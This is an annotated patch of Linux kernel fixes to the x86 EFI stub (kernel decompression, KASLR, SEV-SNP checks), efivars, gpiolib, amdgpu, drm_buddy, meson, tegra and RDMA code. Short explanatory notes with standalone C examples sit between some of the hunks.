+-		if (IS_ENABLED(CONFIG_APPLE_PROPERTIES))
+-			retrieve_apple_device_properties(boot_params);
+-	}
+-
+-	if (IS_ENABLED(CONFIG_EFI_DXE_MEM_ATTRIBUTES))
+-		setup_memory_protection(image_base, image_size);
++	if (IS_ENABLED(CONFIG_APPLE_PROPERTIES) &&
++	    !memcmp(efistub_fw_vendor(), apple, sizeof(apple)))
++		retrieve_apple_device_properties(boot_params);
+ }
+ 
+ /*
+@@ -478,7 +445,6 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 	}
+ 
+ 	image_base = efi_table_attr(image, image_base);
+-	image_offset = (void *)startup_32 - image_base;
+ 
+ 	status = efi_allocate_pages(sizeof(struct boot_params),
+ 				    (unsigned long *)&boot_params, ULONG_MAX);
+@@ -760,85 +726,139 @@ static efi_status_t exit_boot(struct boot_params *boot_params, void *handle)
+ 	return EFI_SUCCESS;
+ }
+ 
++static bool have_unsupported_snp_features(void)
++{
++	u64 unsupported;
++
++	unsupported = snp_get_unsupported_features(sev_get_status());
++	if (unsupported) {
++		efi_err("Unsupported SEV-SNP features detected: 0x%llx\n",
++			unsupported);
++		return true;
++	}
++	return false;
++}
++
++static void efi_get_seed(void *seed, int size)
++{
++	efi_get_random_bytes(size, seed);
++
++	/*
++	 * This only updates seed[0] when running on 32-bit, but in that case,
++	 * seed[1] is not used anyway, as there is no virtual KASLR on 32-bit.
++	 */
++	*(unsigned long *)seed ^= kaslr_get_random_long("EFI");
++}
++
++static void error(char *str)
++{
++	efi_warn("Decompression failed: %s\n", str);
++}
++
++static efi_status_t efi_decompress_kernel(unsigned long *kernel_entry)
++{
++	unsigned long virt_addr = LOAD_PHYSICAL_ADDR;
++	unsigned long addr, alloc_size, entry;
++	efi_status_t status;
++	u32 seed[2] = {};
++
++	/* determine the required size of the allocation */
++	alloc_size = ALIGN(max_t(unsigned long, output_len, kernel_total_size),
++			   MIN_KERNEL_ALIGN);
++
++	if (IS_ENABLED(CONFIG_RANDOMIZE_BASE) && !efi_nokaslr) {
++		u64 range = KERNEL_IMAGE_SIZE - LOAD_PHYSICAL_ADDR - kernel_total_size;
++		static const efi_char16_t ami[] = L"American Megatrends";
++
++		efi_get_seed(seed, sizeof(seed));
++
++		virt_addr += (range * seed[1]) >> 32;
++		virt_addr &= ~(CONFIG_PHYSICAL_ALIGN - 1);
++
++		/*
++		 * Older Dell systems with AMI UEFI firmware v2.0 may hang
++		 * while decompressing the kernel if physical address
++		 * randomization is enabled.
++		 *
++		 * https://bugzilla.kernel.org/show_bug.cgi?id=218173
++		 */
++		if (efi_system_table->hdr.revision <= EFI_2_00_SYSTEM_TABLE_REVISION &&
++		    !memcmp(efistub_fw_vendor(), ami, sizeof(ami))) {
++			efi_debug("AMI firmware v2.0 or older detected - disabling physical KASLR\n");
++			seed[0] = 0;
++		}
++
++		boot_params_ptr->hdr.loadflags |= KASLR_FLAG;
++	}
++
++	status = efi_random_alloc(alloc_size, CONFIG_PHYSICAL_ALIGN, &addr,
++				  seed[0], EFI_LOADER_CODE,
++				  LOAD_PHYSICAL_ADDR,
++				  EFI_X86_KERNEL_ALLOC_LIMIT);
++	if (status != EFI_SUCCESS)
++		return status;
++
++	entry = decompress_kernel((void *)addr, virt_addr, error);
++	if (entry == ULONG_MAX) {
++		efi_free(alloc_size, addr);
++		return EFI_LOAD_ERROR;
++	}
++
++	*kernel_entry = addr + entry;
++
++	return efi_adjust_memory_range_protection(addr, kernel_total_size);
++}
++
++static void __noreturn enter_kernel(unsigned long kernel_addr,
++				    struct boot_params *boot_params)
++{
++	/* enter decompressed kernel with boot_params pointer in RSI/ESI */
++	asm("jmp *%0"::"r"(kernel_addr), "S"(boot_params));
++
++	unreachable();
++}
++
+ /*
+- * On success, we return the address of startup_32, which has potentially been
+- * relocated by efi_relocate_kernel.
+- * On failure, we exit to the firmware via efi_exit instead of returning.
++ * On success, this routine will jump to the relocated image directly and never
++ * return.  On failure, it will exit to the firmware via efi_exit() instead of
++ * returning.
+  */
+-asmlinkage unsigned long efi_main(efi_handle_t handle,
+-				  efi_system_table_t *sys_table_arg,
+-				  struct boot_params *boot_params)
++void __noreturn efi_stub_entry(efi_handle_t handle,
++			       efi_system_table_t *sys_table_arg,
++			       struct boot_params *boot_params)
+ {
+-	unsigned long bzimage_addr = (unsigned long)startup_32;
+-	unsigned long buffer_start, buffer_end;
++	efi_guid_t guid = EFI_MEMORY_ATTRIBUTE_PROTOCOL_GUID;
+ 	struct setup_header *hdr = &boot_params->hdr;
+ 	const struct linux_efi_initrd *initrd = NULL;
++	unsigned long kernel_entry;
+ 	efi_status_t status;
+ 
++	boot_params_ptr = boot_params;
++
+ 	efi_system_table = sys_table_arg;
+ 	/* Check if we were booted by the EFI firmware */
+ 	if (efi_system_table->hdr.signature != EFI_SYSTEM_TABLE_SIGNATURE)
+ 		efi_exit(handle, EFI_INVALID_PARAMETER);
+ 
+-	efi_dxe_table = get_efi_config_table(EFI_DXE_SERVICES_TABLE_GUID);
+-	if (efi_dxe_table &&
+-	    efi_dxe_table->hdr.signature != EFI_DXE_SERVICES_TABLE_SIGNATURE) {
+-		efi_warn("Ignoring DXE services table: invalid signature\n");
+-		efi_dxe_table = NULL;
++	if (have_unsupported_snp_features())
++		efi_exit(handle, EFI_UNSUPPORTED);
++
++	if (IS_ENABLED(CONFIG_EFI_DXE_MEM_ATTRIBUTES)) {
++		efi_dxe_table = get_efi_config_table(EFI_DXE_SERVICES_TABLE_GUID);
++		if (efi_dxe_table &&
++		    efi_dxe_table->hdr.signature != EFI_DXE_SERVICES_TABLE_SIGNATURE) {
++			efi_warn("Ignoring DXE services table: invalid signature\n");
++			efi_dxe_table = NULL;
++		}
+ 	}
+ 
+-	/*
+-	 * If the kernel isn't already loaded at a suitable address,
+-	 * relocate it.
+-	 *
+-	 * It must be loaded above LOAD_PHYSICAL_ADDR.
+-	 *
+-	 * The maximum address for 64-bit is 1 << 46 for 4-level paging. This
+-	 * is defined as the macro MAXMEM, but unfortunately that is not a
+-	 * compile-time constant if 5-level paging is configured, so we instead
+-	 * define our own macro for use here.
+-	 *
+-	 * For 32-bit, the maximum address is complicated to figure out, for
+-	 * now use KERNEL_IMAGE_SIZE, which will be 512MiB, the same as what
+-	 * KASLR uses.
+-	 *
+-	 * Also relocate it if image_offset is zero, i.e. the kernel wasn't
+-	 * loaded by LoadImage, but rather by a bootloader that called the
+-	 * handover entry. The reason we must always relocate in this case is
+-	 * to handle the case of systemd-boot booting a unified kernel image,
+-	 * which is a PE executable that contains the bzImage and an initrd as
+-	 * COFF sections. The initrd section is placed after the bzImage
+-	 * without ensuring that there are at least init_size bytes available
+-	 * for the bzImage, and thus the compressed kernel's startup code may
+-	 * overwrite the initrd unless it is moved out of the way.
+-	 */
++	/* grab the memory attributes protocol if it exists */
++	efi_bs_call(locate_protocol, &guid, NULL, (void **)&memattr);
+ 
+-	buffer_start = ALIGN(bzimage_addr - image_offset,
+-			     hdr->kernel_alignment);
+-	buffer_end = buffer_start + hdr->init_size;
+-
+-	if ((buffer_start < LOAD_PHYSICAL_ADDR)				     ||
+-	    (IS_ENABLED(CONFIG_X86_32) && buffer_end > KERNEL_IMAGE_SIZE)    ||
+-	    (IS_ENABLED(CONFIG_X86_64) && buffer_end > MAXMEM_X86_64_4LEVEL) ||
+-	    (image_offset == 0)) {
+-		extern char _bss[];
+-
+-		status = efi_relocate_kernel(&bzimage_addr,
+-					     (unsigned long)_bss - bzimage_addr,
+-					     hdr->init_size,
+-					     hdr->pref_address,
+-					     hdr->kernel_alignment,
+-					     LOAD_PHYSICAL_ADDR);
+-		if (status != EFI_SUCCESS) {
+-			efi_err("efi_relocate_kernel() failed!\n");
+-			goto fail;
+-		}
+-		/*
+-		 * Now that we've copied the kernel elsewhere, we no longer
+-		 * have a set up block before startup_32(), so reset image_offset
+-		 * to zero in case it was set earlier.
+-		 */
+-		image_offset = 0;
++	status = efi_setup_5level_paging();
++	if (status != EFI_SUCCESS) {
++		efi_err("efi_setup_5level_paging() failed!\n");
++		goto fail;
+ 	}
+ 
+ #ifdef CONFIG_CMDLINE_BOOL
+@@ -858,6 +878,12 @@ asmlinkage unsigned long efi_main(efi_handle_t handle,
+ 		}
+ 	}
+ 
++	status = efi_decompress_kernel(&kernel_entry);
++	if (status != EFI_SUCCESS) {
++		efi_err("Failed to decompress kernel\n");
++		goto fail;
++	}
++
+ 	/*
+ 	 * At this point, an initrd may already have been loaded by the
+ 	 * bootloader and passed via bootparams. We permit an initrd loaded
+@@ -897,7 +923,7 @@ asmlinkage unsigned long efi_main(efi_handle_t handle,
+ 
+ 	setup_efi_pci(boot_params);
+ 
+-	setup_quirks(boot_params, bzimage_addr, buffer_end - buffer_start);
++	setup_quirks(boot_params);
+ 
+ 	status = exit_boot(boot_params, handle);
+ 	if (status != EFI_SUCCESS) {
+@@ -905,9 +931,38 @@ asmlinkage unsigned long efi_main(efi_handle_t handle,
+ 		goto fail;
+ 	}
+ 
+-	return bzimage_addr;
++	/*
++	 * Call the SEV init code while still running with the firmware's
++	 * GDT/IDT, so #VC exceptions will be handled by EFI.
++	 */
++	sev_enable(boot_params);
++
++	efi_5level_switch();
++
++	enter_kernel(kernel_entry, boot_params);
+ fail:
+-	efi_err("efi_main() failed!\n");
++	efi_err("efi_stub_entry() failed!\n");
+ 
+ 	efi_exit(handle, status);
+ }
++
++#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
++void efi_handover_entry(efi_handle_t handle, efi_system_table_t *sys_table_arg,
++			struct boot_params *boot_params)
++{
++	extern char _bss[], _ebss[];
++
++	memset(_bss, 0, _ebss - _bss);
++	efi_stub_entry(handle, sys_table_arg, boot_params);
++}
++
++#ifndef CONFIG_EFI_MIXED
++extern __alias(efi_handover_entry)
++void efi32_stub_entry(efi_handle_t handle, efi_system_table_t *sys_table_arg,
++		      struct boot_params *boot_params);
++
++extern __alias(efi_handover_entry)
++void efi64_stub_entry(efi_handle_t handle, efi_system_table_t *sys_table_arg,
++		      struct boot_params *boot_params);
++#endif
++#endif
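
efi_decompress_kernel() maps a 32-bit seed onto the KASLR range with (range * seed) >> 32, a multiply-shift that scales the seed uniformly into [0, range) without division or modulo bias (the stub then also masks the result down to CONFIG_PHYSICAL_ALIGN). Demonstrated standalone:

    #include <stdint.h>
    #include <stdio.h>

    /* The high word of the 64-bit product is floor(range * seed / 2^32),
     * which is always strictly below range. */
    static uint64_t scale(uint64_t range, uint32_t seed)
    {
        return (range * seed) >> 32;
    }

    int main(void)
    {
        uint64_t range = 512ull << 20;   /* e.g. 512 MiB of slack */

        printf("%#llx\n", (unsigned long long)scale(range, 0));
        printf("%#llx\n", (unsigned long long)scale(range, 0x80000000u));
        printf("%#llx\n", (unsigned long long)scale(range, 0xffffffffu));
        return 0;
    }
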
+diff --git a/drivers/firmware/efi/libstub/x86-stub.h b/drivers/firmware/efi/libstub/x86-stub.h
+new file mode 100644
+index 0000000000000..1c20e99a64944
+--- /dev/null
++++ b/drivers/firmware/efi/libstub/x86-stub.h
+@@ -0,0 +1,17 @@
++/* SPDX-License-Identifier: GPL-2.0-only */
++
++#include <linux/efi.h>
++
++extern void trampoline_32bit_src(void *, bool);
++extern const u16 trampoline_ljmp_imm_offset;
++
++efi_status_t efi_adjust_memory_range_protection(unsigned long start,
++						unsigned long size);
++
++#ifdef CONFIG_X86_64
++efi_status_t efi_setup_5level_paging(void);
++void efi_5level_switch(void);
++#else
++static inline efi_status_t efi_setup_5level_paging(void) { return EFI_SUCCESS; }
++static inline void efi_5level_switch(void) {}
++#endif
+diff --git a/drivers/firmware/efi/vars.c b/drivers/firmware/efi/vars.c
+index 0ba9f18312f5b..4ca256bcd6971 100644
+--- a/drivers/firmware/efi/vars.c
++++ b/drivers/firmware/efi/vars.c
+@@ -66,19 +66,28 @@ int efivars_register(struct efivars *efivars,
+ 		     const struct efivar_operations *ops,
+ 		     struct kobject *kobject)
+ {
++	int rv;
++
+ 	if (down_interruptible(&efivars_lock))
+ 		return -EINTR;
+ 
++	if (__efivars) {
++		pr_warn("efivars already registered\n");
++		rv = -EBUSY;
++		goto out;
++	}
++
+ 	efivars->ops = ops;
+ 	efivars->kobject = kobject;
+ 
+ 	__efivars = efivars;
+ 
+ 	pr_info("Registered efivars operations\n");
+-
++	rv = 0;
++out:
+ 	up(&efivars_lock);
+ 
+-	return 0;
++	return rv;
+ }
+ EXPORT_SYMBOL_GPL(efivars_register);
+ 
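
efivars_register() now refuses a second registration while holding the lock. The shape of the guard (take the lock, test the singleton slot, publish, unlock) is the standard way to make registration safe against duplicates; a userspace sketch with a mutex standing in for the kernel semaphore:

    #include <errno.h>
    #include <pthread.h>

    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
    static void *registered;              /* the singleton slot */

    static int register_once(void *obj)
    {
        int rv = 0;

        pthread_mutex_lock(&lock);
        if (registered)
            rv = -EBUSY;                  /* refuse a second provider */
        else
            registered = obj;             /* publish under the lock */
        pthread_mutex_unlock(&lock);
        return rv;
    }

    int main(void)
    {
        int a, b;

        return register_once(&a) != 0 || register_once(&b) != -EBUSY;
    }
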
+diff --git a/drivers/gpio/gpio-74x164.c b/drivers/gpio/gpio-74x164.c
+index e00c333105170..753e7be039e4d 100644
+--- a/drivers/gpio/gpio-74x164.c
++++ b/drivers/gpio/gpio-74x164.c
+@@ -127,8 +127,6 @@ static int gen_74x164_probe(struct spi_device *spi)
+ 	if (IS_ERR(chip->gpiod_oe))
+ 		return PTR_ERR(chip->gpiod_oe);
+ 
+-	gpiod_set_value_cansleep(chip->gpiod_oe, 1);
+-
+ 	spi_set_drvdata(spi, chip);
+ 
+ 	chip->gpio_chip.label = spi->modalias;
+@@ -153,6 +151,8 @@ static int gen_74x164_probe(struct spi_device *spi)
+ 		goto exit_destroy;
+ 	}
+ 
++	gpiod_set_value_cansleep(chip->gpiod_oe, 1);
++
+ 	ret = gpiochip_add_data(&chip->gpio_chip, chip);
+ 	if (!ret)
+ 		return 0;
+diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c
+index 6d3e3454a6ed6..9d8c783124033 100644
+--- a/drivers/gpio/gpiolib.c
++++ b/drivers/gpio/gpiolib.c
+@@ -784,11 +784,11 @@ int gpiochip_add_data_with_key(struct gpio_chip *gc, void *data,
+ 
+ 	ret = gpiochip_irqchip_init_valid_mask(gc);
+ 	if (ret)
+-		goto err_remove_acpi_chip;
++		goto err_free_hogs;
+ 
+ 	ret = gpiochip_irqchip_init_hw(gc);
+ 	if (ret)
+-		goto err_remove_acpi_chip;
++		goto err_remove_irqchip_mask;
+ 
+ 	ret = gpiochip_add_irqchip(gc, lock_key, request_key);
+ 	if (ret)
+@@ -813,13 +813,13 @@ int gpiochip_add_data_with_key(struct gpio_chip *gc, void *data,
+ 	gpiochip_irqchip_remove(gc);
+ err_remove_irqchip_mask:
+ 	gpiochip_irqchip_free_valid_mask(gc);
+-err_remove_acpi_chip:
++err_free_hogs:
++	gpiochip_free_hogs(gc);
+ 	acpi_gpiochip_remove(gc);
++	gpiochip_remove_pin_ranges(gc);
+ err_remove_of_chip:
+-	gpiochip_free_hogs(gc);
+ 	of_gpiochip_remove(gc);
+ err_free_gpiochip_mask:
+-	gpiochip_remove_pin_ranges(gc);
+ 	gpiochip_free_valid_mask(gc);
+ 	if (gdev->dev.release) {
+ 		/* release() has been registered by gpiochip_setup_dev() */
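
The gpiolib fix is a reminder that a goto error ladder must tear down in exactly the reverse order of construction, with each label sitting below the failure point that jumps to it. The generic shape, runnable with stubbed steps:

    #include <stdio.h>

    static int init_a(void) { puts("init a"); return 0; }
    static int init_b(void) { puts("init b"); return 0; }
    static int init_c(void) { puts("init c"); return -1; }  /* forced fail */
    static void undo_b(void) { puts("undo b"); }
    static void undo_a(void) { puts("undo a"); }

    /* Unwind in exactly the reverse order of construction; each label
     * names the last successful step it tears down. */
    static int setup(void)
    {
        if (init_a())
            return -1;
        if (init_b())
            goto err_undo_a;
        if (init_c())
            goto err_undo_b;
        return 0;

    err_undo_b:
        undo_b();
    err_undo_a:
        undo_a();
        return -1;
    }

    int main(void)
    {
        return setup() ? 1 : 0;
    }
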
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/Makefile b/drivers/gpu/drm/amd/display/dc/dml/Makefile
+index 6fdf87a6e240f..6c7b286e1123d 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/dml/Makefile
+@@ -51,8 +51,12 @@ endif
+ endif
+ 
+ ifneq ($(CONFIG_FRAME_WARN),0)
++ifeq ($(filter y,$(CONFIG_KASAN)$(CONFIG_KCSAN)),y)
++frame_warn_flag := -Wframe-larger-than=3072
++else
+ frame_warn_flag := -Wframe-larger-than=2048
+ endif
++endif
+ 
+ CFLAGS_$(AMDDALPATH)/dc/dml/display_mode_lib.o := $(dml_ccflags)
+ 
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+index dc0a6fba7050f..ff1032de4f76d 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+@@ -6925,6 +6925,23 @@ static int si_dpm_enable(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
++static int si_set_temperature_range(struct amdgpu_device *adev)
++{
++	int ret;
++
++	ret = si_thermal_enable_alert(adev, false);
++	if (ret)
++		return ret;
++	ret = si_thermal_set_temperature_range(adev, R600_TEMP_RANGE_MIN, R600_TEMP_RANGE_MAX);
++	if (ret)
++		return ret;
++	ret = si_thermal_enable_alert(adev, true);
++	if (ret)
++		return ret;
++
++	return ret;
++}
++
+ static void si_dpm_disable(struct amdgpu_device *adev)
+ {
+ 	struct rv7xx_power_info *pi = rv770_get_pi(adev);
+@@ -7608,6 +7625,18 @@ static int si_dpm_process_interrupt(struct amdgpu_device *adev,
+ 
+ static int si_dpm_late_init(void *handle)
+ {
++	int ret;
++	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
++
++	if (!adev->pm.dpm_enabled)
++		return 0;
++
++	ret = si_set_temperature_range(adev);
++	if (ret)
++		return ret;
++#if 0 //TODO ?
++	si_dpm_powergate_uvd(adev, true);
++#endif
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/drm_buddy.c b/drivers/gpu/drm/drm_buddy.c
+index 7098f125b54a9..fd32041f82263 100644
+--- a/drivers/gpu/drm/drm_buddy.c
++++ b/drivers/gpu/drm/drm_buddy.c
+@@ -332,6 +332,7 @@ alloc_range_bias(struct drm_buddy *mm,
+ 		 u64 start, u64 end,
+ 		 unsigned int order)
+ {
++	u64 req_size = mm->chunk_size << order;
+ 	struct drm_buddy_block *block;
+ 	struct drm_buddy_block *buddy;
+ 	LIST_HEAD(dfs);
+@@ -367,6 +368,15 @@ alloc_range_bias(struct drm_buddy *mm,
+ 		if (drm_buddy_block_is_allocated(block))
+ 			continue;
+ 
++		if (block_start < start || block_end > end) {
++			u64 adjusted_start = max(block_start, start);
++			u64 adjusted_end = min(block_end, end);
++
++			if (round_down(adjusted_end + 1, req_size) <=
++			    round_up(adjusted_start, req_size))
++				continue;
++		}
++
+ 		if (contains(start, end, block_start, block_end) &&
+ 		    order == drm_buddy_block_order(block)) {
+ 			/*
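
The drm_buddy check rejects a block early when the caller's [start, end] window clips it so tightly that no naturally aligned chunk of the requested size fits in the clipped part: round the clipped end down and the clipped start up to the request size, and require the former to exceed the latter. The test in isolation:

    #include <stdbool.h>
    #include <stdio.h>

    /* true if [lo, hi] (inclusive) holds a size-aligned, size-sized block */
    static bool fits(unsigned long lo, unsigned long hi, unsigned long size)
    {
        unsigned long down = ((hi + 1) / size) * size;        /* round down */
        unsigned long up   = ((lo + size - 1) / size) * size; /* round up   */

        return down > up;
    }

    int main(void)
    {
        printf("%d\n", fits(0x0000, 0x1fff, 0x1000));  /* 1: one fits    */
        printf("%d\n", fits(0x0800, 0x17ff, 0x1000));  /* 0: straddles   */
        return 0;
    }
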
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index 119544d88b586..fbac39aa38cc4 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -316,32 +316,34 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 		goto exit_afbcd;
+ 
+ 	if (has_components) {
+-		ret = component_bind_all(drm->dev, drm);
++		ret = component_bind_all(dev, drm);
+ 		if (ret) {
+ 			dev_err(drm->dev, "Couldn't bind all components\n");
++			/* Do not try to unbind */
++			has_components = false;
+ 			goto exit_afbcd;
+ 		}
+ 	}
+ 
+ 	ret = meson_encoder_hdmi_init(priv);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	ret = meson_plane_create(priv);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	ret = meson_overlay_create(priv);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	ret = meson_crtc_create(priv);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	ret = request_irq(priv->vsync_irq, meson_irq, 0, drm->driver->name, drm);
+ 	if (ret)
+-		goto unbind_all;
++		goto exit_afbcd;
+ 
+ 	drm_mode_config_reset(drm);
+ 
+@@ -359,15 +361,18 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ uninstall_irq:
+ 	free_irq(priv->vsync_irq, drm);
+-unbind_all:
+-	if (has_components)
+-		component_unbind_all(drm->dev, drm);
+ exit_afbcd:
+ 	if (priv->afbcd.ops)
+ 		priv->afbcd.ops->exit(priv);
+ free_drm:
+ 	drm_dev_put(drm);
+ 
++	meson_encoder_hdmi_remove(priv);
++	meson_encoder_cvbs_remove(priv);
++
++	if (has_components)
++		component_unbind_all(dev, drm);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/gpu/drm/meson/meson_encoder_cvbs.c b/drivers/gpu/drm/meson/meson_encoder_cvbs.c
+index 3f73b211fa8e3..3407450435e20 100644
+--- a/drivers/gpu/drm/meson/meson_encoder_cvbs.c
++++ b/drivers/gpu/drm/meson/meson_encoder_cvbs.c
+@@ -294,6 +294,5 @@ void meson_encoder_cvbs_remove(struct meson_drm *priv)
+ 	if (priv->encoders[MESON_ENC_CVBS]) {
+ 		meson_encoder_cvbs = priv->encoders[MESON_ENC_CVBS];
+ 		drm_bridge_remove(&meson_encoder_cvbs->bridge);
+-		drm_bridge_remove(meson_encoder_cvbs->next_bridge);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/meson/meson_encoder_hdmi.c b/drivers/gpu/drm/meson/meson_encoder_hdmi.c
+index b14e6e507c61b..03062e7a02b64 100644
+--- a/drivers/gpu/drm/meson/meson_encoder_hdmi.c
++++ b/drivers/gpu/drm/meson/meson_encoder_hdmi.c
+@@ -472,6 +472,5 @@ void meson_encoder_hdmi_remove(struct meson_drm *priv)
+ 	if (priv->encoders[MESON_ENC_HDMI]) {
+ 		meson_encoder_hdmi = priv->encoders[MESON_ENC_HDMI];
+ 		drm_bridge_remove(&meson_encoder_hdmi->bridge);
+-		drm_bridge_remove(meson_encoder_hdmi->next_bridge);
+ 	}
+ }
+diff --git a/drivers/gpu/drm/tegra/drm.c b/drivers/gpu/drm/tegra/drm.c
+index 5fc55b9777cbf..6806779f8ecce 100644
+--- a/drivers/gpu/drm/tegra/drm.c
++++ b/drivers/gpu/drm/tegra/drm.c
+@@ -1252,9 +1252,26 @@ static int host1x_drm_probe(struct host1x_device *dev)
+ 
+ 	drm_mode_config_reset(drm);
+ 
+-	err = drm_aperture_remove_framebuffers(&tegra_drm_driver);
+-	if (err < 0)
+-		goto hub;
++	/*
++	 * Only take over from a potential firmware framebuffer if any CRTCs
++	 * have been registered. This must not be a fatal error because there
++	 * are other accelerators that are exposed via this driver.
++	 *
++	 * Another case where this happens is on Tegra234 where the display
++	 * hardware is no longer part of the host1x complex, so this driver
++	 * will not expose any modesetting features.
++	 */
++	if (drm->mode_config.num_crtc > 0) {
++		err = drm_aperture_remove_framebuffers(&tegra_drm_driver);
++		if (err < 0)
++			goto hub;
++	} else {
++		/*
++		 * Indicate to userspace that this doesn't expose any display
++		 * capabilities.
++		 */
++		drm->driver_features &= ~(DRIVER_MODESET | DRIVER_ATOMIC);
++	}
+ 
+ 	err = tegra_drm_fb_init(drm);
+ 	if (err < 0)
+diff --git a/drivers/infiniband/core/cm_trace.h b/drivers/infiniband/core/cm_trace.h
+index e9d282679ef15..944d9071245d2 100644
+--- a/drivers/infiniband/core/cm_trace.h
++++ b/drivers/infiniband/core/cm_trace.h
+@@ -16,7 +16,7 @@
+ 
+ #include <linux/tracepoint.h>
+ #include <rdma/ib_cm.h>
+-#include <trace/events/rdma.h>
++#include <trace/misc/rdma.h>
+ 
+ /*
+  * enum ib_cm_state, from include/rdma/ib_cm.h
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 0773ca7ace247..067d7f42871ff 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -3547,121 +3547,6 @@ static int cma_resolve_ib_addr(struct rdma_id_private *id_priv)
+ 	return ret;
+ }
+ 
+-static int cma_bind_addr(struct rdma_cm_id *id, struct sockaddr *src_addr,
+-			 const struct sockaddr *dst_addr)
+-{
+-	struct sockaddr_storage zero_sock = {};
+-
+-	if (src_addr && src_addr->sa_family)
+-		return rdma_bind_addr(id, src_addr);
+-
+-	/*
+-	 * When the src_addr is not specified, automatically supply an any addr
+-	 */
+-	zero_sock.ss_family = dst_addr->sa_family;
+-	if (IS_ENABLED(CONFIG_IPV6) && dst_addr->sa_family == AF_INET6) {
+-		struct sockaddr_in6 *src_addr6 =
+-			(struct sockaddr_in6 *)&zero_sock;
+-		struct sockaddr_in6 *dst_addr6 =
+-			(struct sockaddr_in6 *)dst_addr;
+-
+-		src_addr6->sin6_scope_id = dst_addr6->sin6_scope_id;
+-		if (ipv6_addr_type(&dst_addr6->sin6_addr) & IPV6_ADDR_LINKLOCAL)
+-			id->route.addr.dev_addr.bound_dev_if =
+-				dst_addr6->sin6_scope_id;
+-	} else if (dst_addr->sa_family == AF_IB) {
+-		((struct sockaddr_ib *)&zero_sock)->sib_pkey =
+-			((struct sockaddr_ib *)dst_addr)->sib_pkey;
+-	}
+-	return rdma_bind_addr(id, (struct sockaddr *)&zero_sock);
+-}
+-
+-/*
+- * If required, resolve the source address for bind and leave the id_priv in
+- * state RDMA_CM_ADDR_BOUND. This oddly uses the state to determine the prior
+- * calls made by ULP, a previously bound ID will not be re-bound and src_addr is
+- * ignored.
+- */
+-static int resolve_prepare_src(struct rdma_id_private *id_priv,
+-			       struct sockaddr *src_addr,
+-			       const struct sockaddr *dst_addr)
+-{
+-	int ret;
+-
+-	memcpy(cma_dst_addr(id_priv), dst_addr, rdma_addr_size(dst_addr));
+-	if (!cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND, RDMA_CM_ADDR_QUERY)) {
+-		/* For a well behaved ULP state will be RDMA_CM_IDLE */
+-		ret = cma_bind_addr(&id_priv->id, src_addr, dst_addr);
+-		if (ret)
+-			goto err_dst;
+-		if (WARN_ON(!cma_comp_exch(id_priv, RDMA_CM_ADDR_BOUND,
+-					   RDMA_CM_ADDR_QUERY))) {
+-			ret = -EINVAL;
+-			goto err_dst;
+-		}
+-	}
+-
+-	if (cma_family(id_priv) != dst_addr->sa_family) {
+-		ret = -EINVAL;
+-		goto err_state;
+-	}
+-	return 0;
+-
+-err_state:
+-	cma_comp_exch(id_priv, RDMA_CM_ADDR_QUERY, RDMA_CM_ADDR_BOUND);
+-err_dst:
+-	memset(cma_dst_addr(id_priv), 0, rdma_addr_size(dst_addr));
+-	return ret;
+-}
+-
+-int rdma_resolve_addr(struct rdma_cm_id *id, struct sockaddr *src_addr,
+-		      const struct sockaddr *dst_addr, unsigned long timeout_ms)
+-{
+-	struct rdma_id_private *id_priv =
+-		container_of(id, struct rdma_id_private, id);
+-	int ret;
+-
+-	ret = resolve_prepare_src(id_priv, src_addr, dst_addr);
+-	if (ret)
+-		return ret;
+-
+-	if (cma_any_addr(dst_addr)) {
+-		ret = cma_resolve_loopback(id_priv);
+-	} else {
+-		if (dst_addr->sa_family == AF_IB) {
+-			ret = cma_resolve_ib_addr(id_priv);
+-		} else {
+-			/*
+-			 * The FSM can return back to RDMA_CM_ADDR_BOUND after
+-			 * rdma_resolve_ip() is called, eg through the error
+-			 * path in addr_handler(). If this happens the existing
+-			 * request must be canceled before issuing a new one.
+-			 * Since canceling a request is a bit slow and this
+-			 * oddball path is rare, keep track once a request has
+-			 * been issued. The track turns out to be a permanent
+-			 * state since this is the only cancel as it is
+-			 * immediately before rdma_resolve_ip().
+-			 */
+-			if (id_priv->used_resolve_ip)
+-				rdma_addr_cancel(&id->route.addr.dev_addr);
+-			else
+-				id_priv->used_resolve_ip = 1;
+-			ret = rdma_resolve_ip(cma_src_addr(id_priv), dst_addr,
+-					      &id->route.addr.dev_addr,
+-					      timeout_ms, addr_handler,
+-					      false, id_priv);
+-		}
+-	}
+-	if (ret)
+-		goto err;
+-
+-	return 0;
+-err:
+-	cma_comp_exch(id_priv, RDMA_CM_ADDR_QUERY, RDMA_CM_ADDR_BOUND);
+-	return ret;
+-}
+-EXPORT_SYMBOL(rdma_resolve_addr);
+-
+ int rdma_set_reuseaddr(struct rdma_cm_id *id, int reuse)
+ {
+ 	struct rdma_id_private *id_priv;
